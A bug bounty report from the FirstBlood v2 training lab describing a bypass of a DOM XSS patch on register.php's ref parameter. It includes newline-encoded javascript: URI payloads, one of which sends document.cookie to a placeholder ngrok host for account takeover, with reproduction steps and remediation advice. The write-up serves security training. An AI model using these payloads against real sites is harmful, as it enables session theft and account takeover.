FirstBlood-#617 — [COLLAB] DOM XSS on register patch bypass
This issue was discovered on FirstBlood v2
On 2021-10-26, amec0e Level 3 reported:
Hey mate,
Using a previous report for a DOM XSS on the endpoint register.php
via the parameter ref=
. Playing with this I was able to find a bypass for the current patch, using newline encodings we can achieve XSS. DUe to the lack of HttpOnly
flag on drps
cookies we can leak this token for a full ATO.
Impact:
Due to the lack of httponly
on the drps
cookie it is entirely possible using the payload below to steal a drps
cookie when they click "Return to previous page" on the regiser.php endpoint with the ref parameter.
jav%0Aascr%0Aipt:window.location.href=`YOURNGROKADDRESS/${document.cookie}`
Steps to Reproduce:
(Doctor NOT logged in)
- Visit the endpoint
register.php
- Append the following payload to the URL and press "Enter"
?ref=jav%0Aascr%0Aipt:confirm(document.domain);
- Now click "Return to previous page" and observe the payload triggering.
(Logged in as Doctor)
- Visit the endpoint
register.php
- Start your Ngrok server.
- Append the following payload to the URL and press "Enter"
?ref=jav%0Aascr%0Aipt:window.location.href=`YOURNGROKADDRESS/${document.cookie}`
- Now click "Return to previous page" and observe the cookie has been sent to our ngrok server.
Remeditation:
Set the flag HttpOnly
on the doctors cookies and disallow for javascript URI redirections.
(Please do verify these remediation steps to ensure they are accurate)
Best regards,
Amec0e.
In Collaboration with thebinarybot
P3 Medium
Endpoint: register.php
Parameter: ?ref=
Payload: NA
FirstBlood ID: 32
Vulnerability Type: Reflective XSS
The parameter ?ref on register.php was poorly fixed and can be bypassed in various ways. Firstly the developer failed to use strtolower() when comparing strings, and the use of characters such as
%09
will also bypass the filter.